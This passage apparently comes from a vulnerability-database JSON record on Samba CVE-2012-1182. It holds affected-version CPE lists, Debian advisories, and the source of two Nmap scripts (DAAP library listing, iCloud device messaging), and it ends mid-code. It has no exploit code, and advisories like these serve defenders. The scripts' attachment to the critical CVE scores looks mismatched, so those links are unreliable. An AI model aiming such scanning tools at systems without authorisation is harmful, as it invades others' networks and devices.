"cpe:2.3:a:samba:samba:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:d:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:pre1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23d:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.27:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21:a:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.25:c:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.14a:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.23b:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.20:b:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.21c:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.0.9:*:*:*:*:*:*:*"]}], "debian": [{"lastseen": "2021-10-21T23:58:48", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2450-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nApril 12, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nVulnerability : privilege escalation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-1182\nDebian Bug : 668309\n\nIt was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2012-04-12T20:29:01", "type": "debian", "title": "[SECURITY] [DSA 2450-1] samba security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-12T20:29:01", "id": "DEBIAN:DSA-2450-1:77F45", "href": "https://lists.debian.org/debian-security-announce/2012/msg00080.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-23T20:17:56", "description": "I uploaded new packages for samba which fixed the following security problem:\n\nCVE-2012-1182\n PIDL based autogenerated code allows overwriting beyond of allocated\n array.\n\nFor the squeeze-backports distribution the problems have been fixed in\nversion 2:3.6.4-1~bpo60+1.\n\n-- \n\n\n\nAttachment:\nsignature.asc\nDescription: Digital signature\n", "cvss3": {}, "published": "2012-04-14T08:51:02", "type": "debian", "title": "[BSA-070] Security Update for samba", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T08:51:02", "id": "DEBIAN:BSA-070:68853", "href": "https://lists.debian.org/debian-backports-announce/2012/04/msg00000.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-05-13T07:37:45", "description": "The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call.", "cvss3": {}, "published": "2012-04-10T21:55:00", "type": "debiancve", "title": "CVE-2012-1182", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-10T21:55:00", "id": "DEBIANCVE:CVE-2012-1182", "href": "https://security-tracker.debian.org/tracker/CVE-2012-1182", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nmap": [{"lastseen": "2022-02-15T21:46:14", "description": "Retrieves a list of music from a DAAP server. The list includes artist names and album and song titles. \n\nOutput will be capped to 100 items if not otherwise specified in the `daap_item_limit` script argument. A `daap_item_limit` below zero outputs the complete contents of the DAAP library. \n\nBased on documentation found here: <http://www.tapjam.net/daap/>.\n\n## Script Arguments \n\n#### daap_item_limit \n\nChanges the output limit from 100 songs. If set to a negative value, no limit is enforced.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV --script=daap-get-library <target>\n\n## Script Output \n \n \n | daap-get-library:\n | BUBBA|TWO\n | Fever Ray\n | Fever Ray (Deluxe Edition)\n | Concrete Walls\n | I'm Not Done\n | Here Before\n | Now's The Only Time I Know\n | Stranger Than Kindness\n | Dry And Dusty\n | Keep The Streets Empty For Me\n | Triangle Walks\n | If I Had A Heart\n | Seven\n | When I Grow Up\n |_ Coconut\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-25T23:51:44", "type": "nmap", "title": "daap-get-library NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:00", "id": "NMAP:DAAP-GET-LIBRARY.NSE", "href": "https://nmap.org/nsedoc/scripts/daap-get-library.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves a list of music from a DAAP server. The list includes artist\nnames and album and song titles.\n\nOutput will be capped to 100 items if not otherwise specified in the\n<code>daap_item_limit</code> script argument. A\n<code>daap_item_limit</code> below zero outputs the complete contents of\nthe DAAP library.\n\nBased on documentation found here:\nhttp://www.tapjam.net/daap/.\n]]\n\n---\n-- @args daap_item_limit Changes the output limit from 100 songs. If set to a negative value, no limit is enforced.\n--\n-- @output\n-- | daap-get-library:\n-- | BUBBA|TWO\n-- | Fever Ray\n-- | Fever Ray (Deluxe Edition)\n-- | Concrete Walls\n-- | I'm Not Done\n-- | Here Before\n-- | Now's The Only Time I Know\n-- | Stranger Than Kindness\n-- | Dry And Dusty\n-- | Keep The Streets Empty For Me\n-- | Triangle Walks\n-- | If I Had A Heart\n-- | Seven\n-- | When I Grow Up\n-- |_ Coconut\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\n-- Version 0.2\n-- Created 01/14/2010 - v0.1 - created by Patrik Karlsson\n-- Revised 01/23/2010 - v0.2 - changed to port_or_service, added link to documentation, limited output to 100 songs or to daap_item_limit script argument.\n\nportrule = shortport.port_or_service(3689, \"daap\")\n\n--- Gets the name of the library from the server\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @return string containing the name of the library\nfunction getLibraryName( host, port )\n local libname, pos\n local url = \"daap://\" .. host.ip .. \"/server-info\"\n local response = http.get( host, port, url, nil, nil, nil)\n\n if response == nil or response.body == nil or response.body==\"\" then\n return\n end\n\n pos = string.find(response.body, \"minm\")\n\n if pos > 0 then\n pos = pos + 4\n libname, pos = string.unpack( \">s4\", response.body, pos )\n end\n\n return libname\nend\n\n--- Reads the first item value specified by name\n--\n-- @param data string containing the unparsed item\n-- @param name string containing the name of the value to read\n-- @return number\nlocal function getAttributeAsInt( data, name )\n\n local pos = string.find(data, name)\n local attrib\n\n if pos and pos > 0 then\n pos = pos + 4\n local len\n len, pos = string.unpack( \">I4\", data, pos )\n\n if ( len ~= 4 ) then\n stdnse.debug1(\"Unexpected length returned: %d\", len )\n return\n end\n\n attrib, pos = string.unpack( \">I4\", data, pos )\n end\n\n return attrib\n\nend\n\n--- Gets the revision number for the library\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @return number containing the session identity received from the server\nfunction getSessionId( host, port )\n\n local sessionid\n local response = http.get( host, port, \"/login\", nil, nil, nil )\n\n if response ~= nil then\n sessionid = getAttributeAsInt( response.body, \"mlid\")\n end\n\n return sessionid\nend\n\n--- Gets the revision number for the library\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @param sessionid number containing session identifier from <code>getSessionId</code>\n-- @return number containing the revision number for the library\nfunction getRevisionNumber( host, port, sessionid )\n local url = \"/update?session-id=\" .. sessionid .. \"&revision-number=1\"\n local revision\n local response = http.get( host, port, url, nil, nil, nil )\n\n if response ~= nil then\n revision = getAttributeAsInt( response.body, \"musr\")\n end\n\n return revision\nend\n\n--- Gets the database identity for the library\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @param sessionid number containing session identifier from <code>getSessionId</code>\n-- @param revid number containing the revision id as retrieved from <code>getRevisionNumber</code>\nfunction getDatabaseId( host, port, sessionid, revid )\n local url = \"/databases?session-id=\" .. sessionid .. \"&revision-number=\" .. revid\n local response = http.get( host, port, url, nil, nil, nil )\n local miid\n\n if response ~= nil then\n miid = getAttributeAsInt( response.body, \"miid\")\n end\n\n return miid\nend\n\n--- Gets a string item type from data\n--\n-- @param data string starting with the 4-bytes of length\n-- @param pos number containing offset into data\n-- @return pos number containing new position after reading string\n-- @return value string containing the string item that was read\nlocal function getStringItem( data, pos )\n local item, pos = string.unpack(\">s4\", data, pos)\n return pos, item\nend\n\nlocal itemFetcher = {}\n\nitemFetcher[\"mikd\"] = function( data, pos ) return getStringItem( data, pos ) end\nitemFetcher[\"miid\"] = itemFetcher[\"mikd\"]\nitemFetcher[\"minm\"] = itemFetcher[\"mikd\"]\nitemFetcher[\"asal\"] = itemFetcher[\"mikd\"]\nitemFetcher[\"asar\"] = itemFetcher[\"mikd\"]\n\n--- Parses a single item (mlit)\n--\n-- @param data string containing the unparsed item starting at the first available tag\n-- @param len number containing the length of the item\n-- @return item table containing <code>mikd</code>, <code>miid</code>, <code>minm</code>,\n-- <code>asal</code> and <code>asar</code> when available\nparseItem = function( data, len )\n\n local pos, name, value = 1, nil, nil\n local item = {}\n\n while( len - pos > 0 ) do\n name, pos = string.unpack( \"c4\", data, pos )\n\n if itemFetcher[name] then\n pos, item[name] = itemFetcher[name](data, pos )\n else\n stdnse.debug1(\"No itemfetcher for: %s\", name)\n break\n end\n\n end\n\n return item\n\nend\n\n--- Request and process all music items\n--\n-- @param host table containing an ip field.\n-- @param port table containing number and protocol fields.\n-- @param sessionid number containing session identifier from <code>getSessionId</code>\n-- @param dbid number containing database id from <code>getDatabaseId</code>\n-- @param limit number containing the maximum amount of songs to return\n-- @return table containing the following structure [artist][album][songs]\nfunction getItems( host, port, sessionid, revid, dbid, limit )\n local meta = \"dmap.itemid,dmap.itemname,dmap.itemkind,daap.songalbum,daap.songartist\"\n local url = \"/databases/\" .. dbid .. \"/items?type=music&meta=\" .. meta .. \"&session-id=\" .. sessionid .. \"&revision-number=\" .. revid\n local response = http.get( host, port, url, nil, nil, nil )\n local item, data, pos, len\n local items = {}\n local limit = limit or -1\n\n if response == nil then\n return\n end\n\n -- get our position to the list of items\n pos = string.find(response.body, \"mlcl\")\n pos = pos + 4\n\n while ( pos > 0 and pos + 8 < response.body:len() ) do\n\n -- find the next single item\n pos = string.find(response.body, \"mlit\", pos)\n pos = pos + 4\n\n len, pos = string.unpack( \">I4\", response.body, pos )\n\n if ( pos < response.body:len() and pos + len < response.body:len() ) then\n data, pos = string.unpack( \"c\" .. len, response.body, pos )\n else\n break\n end\n\n -- parse a single item\n item = parseItem( data, len )\n\n local album = item.asal or \"unknown\"\n local artist= item.asar or \"unknown\"\n local song = item.minm or \"\"\n\n if items[artist] == nil then\n items[artist] = {}\n end\n\n if items[artist][album] == nil then\n items[artist][album] = {}\n end\n\n if limit == 0 then\n break\n elseif limit > 0 then\n limit = limit - 1\n end\n\n table.insert( items[artist][album], song )\n\n end\n\n\n return items\n\nend\n\n\naction = function(host, port)\n\n local limit = tonumber(nmap.registry.args.daap_item_limit) or 100\n local libname = getLibraryName( host, port )\n\n if libname == nil then\n return\n end\n\n local sessionid = getSessionId( host, port )\n\n if sessionid == nil then\n return stdnse.format_output(true, \"Libname: \" .. libname)\n end\n\n local revid = getRevisionNumber( host, port, sessionid )\n\n if revid == nil then\n return stdnse.format_output(true, \"Libname: \" .. libname)\n end\n\n local dbid = getDatabaseId( host, port, sessionid, revid )\n\n if dbid == nil then\n return\n end\n\n local items = getItems( host, port, sessionid, revid, dbid, limit )\n\n if items == nil then\n return\n end\n\n local albums, songs, artists, results = {}, {}, {}, {}\n\n table.insert( results, libname )\n\n for artist, v in pairs(items) do\n albums = {}\n for album, v2 in pairs(v) do\n songs = {}\n for _, song in pairs( v2 ) do\n table.insert( songs, song )\n end\n table.insert( albums, album )\n table.insert( albums, songs )\n end\n table.insert( artists, artist )\n table.insert( artists, albums )\n end\n\n table.insert( results, artists )\n local output = stdnse.format_output( true, results )\n\n if limit > 0 then\n output = output .. string.format(\"\\n\\nOutput limited to %d items\", limit )\n end\n\n return output\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:34", "description": "Sends a message to a iOS device through the Apple MobileMe web service. The device has to be registered with an Apple ID using the Find My Iphone application.\n\n## Script Arguments \n\n#### http-icloud-sendmsg.username \n\nthe Apple ID username\n\n#### http-icloud-sendmsg.sound \n\nboolean specifying if a loud sound should be played while displaying the message. (default: true)\n\n#### http-icloud-sendmsg.subject \n\nthe subject of the message to send to the device.\n\n#### http-icloud-sendmsg.message \n\nthe body of the message to send to the device.\n\n#### http-icloud-sendmsg.deviceindex \n\nthe device index to which the message should be sent (@see http-icloud-sendmsg.listdevices)\n\n#### http-icloud-sendmsg.password \n\nthe Apple ID password\n\n#### http-icloud-sendmsg.listdevices \n\nlist the devices managed by the specified Apple ID.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,http-icloud-sendmsg.listdevices\"\n nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,deviceindex=1,subject='subject',message='hello world.',sound=false\"\n \n\n## Script Output \n \n \n Pre-scan script results:\n | http-icloud-sendmsg:\n |_ Message was successfully sent to \"Patrik Karlsson's iPhone\"\n \n\n## Requires \n\n * [mobileme](<../lib/mobileme.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-17T19:35:44", "type": "nmap", "title": "http-icloud-sendmsg NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-ICLOUD-SENDMSG.NSE", "href": "https://nmap.org/nsedoc/scripts/http-icloud-sendmsg.html", "sourceData": "local mobileme = require \"mobileme\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\n\ndescription = [[\nSends a message to a iOS device through the Apple MobileMe web service. The\ndevice has to be registered with an Apple ID using the Find My Iphone\napplication.\n]]\n\n---\n-- @usage\n-- nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,http-icloud-sendmsg.listdevices\"\n-- nmap -sn -Pn --script http-icloud-sendmsg --script-args=\"username=<user>,password=<pass>,deviceindex=1,subject='subject',message='hello world.',sound=false\"\n--\n-- @output\n-- Pre-scan script results:\n-- | http-icloud-sendmsg:\n-- |_ Message was successfully sent to \"Patrik Karlsson's iPhone\"\n--\n-- @args http-icloud-sendmsg.username the Apple ID username\n-- @args http-icloud-sendmsg.password the Apple ID password\n-- @args http-icloud-sendmsg.listdevices list the devices managed by the\n-- specified Apple ID.\n-- @args http-icloud-sendmsg.deviceindex the device index to which the message\n-- should be sent (@see http-icloud-sendmsg.listdevices)\n-- @args http-icloud-sendmsg.subject the subject of the message to send to the\n-- device.\n-- @args http-icloud-sendmsg.message the body of the message to send to the\n-- device.\n-- @args http-icloud-sendmsg.sound boolean specifying if a loud sound should be\n-- played while displaying the message. (default: true)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\", \"external\"}\n\n\nlocal arg_username = stdnse.get_script_args(SCRIPT_NAME .. \".username\")\nlocal arg_password = stdnse.get_script_args(SCRIPT_NAME .. \".password\")\nlocal arg_listdevices = stdnse.get_script_args(SCRIPT_NAME .. \".listdevices\")\nlocal arg_deviceindex = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".deviceindex\"))\nlocal arg_subject = stdnse.get_script_args(SCRIPT_NAME .. \".subject\")\nlocal arg_message = stdnse.get_script_args(SCRIPT_NAME .. \".message\")\nlocal arg_sound = stdnse.get_script_args(SCRIPT_NAME .. \".sound\") or true\n\n\nprerule = function() return true end\n\n-- decode basic UTF8 encoded strings\n-- iOS devices are commonly named after the user eg:\n-- * Patrik Karlsson's Macbook Air\n-- * Patrik Karlsson's iPhone\n--\n-- This function decodes the single quote as a start and should really\n-- be replaced with a proper UTF-8 decoder in the future\nlocal function decodeString(str)\n return str:gsub(\"\\226\\128\\153\", \"'\")\nend\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\nlocal function listDevices(mm)\n local status, devices = mm:getDevices()\n if ( not(status) ) then\n return fail(\"Failed to get devices\")\n end\n\n local output = tab.new(2)\n tab.addrow(output, \"id\", \"name\")\n for i=1, #devices do\n local name = decodeString(devices[i].name or \"\")\n tab.addrow(output, i, name)\n end\n\n if ( 1 < #output ) then\n return stdnse.format_output(true, tab.dump(output))\n end\nend\n\n\naction = function()\n if ( not(arg_username) or not(arg_password) ) then\n return fail(\"No username or password was supplied\")\n end\n\n if ( not(arg_deviceindex) and not(arg_listdevices) ) then\n return fail(\"No device ID was specified\")\n end\n\n if ( 1 == tonumber(arg_listdevices) or \"true\" == arg_listdevices ) then\n local mm = mobileme.Helper:new(arg_username, arg_password)\n return listDevices(mm)\n elseif ( not(arg_subject) or not(arg_message) ) then\n return 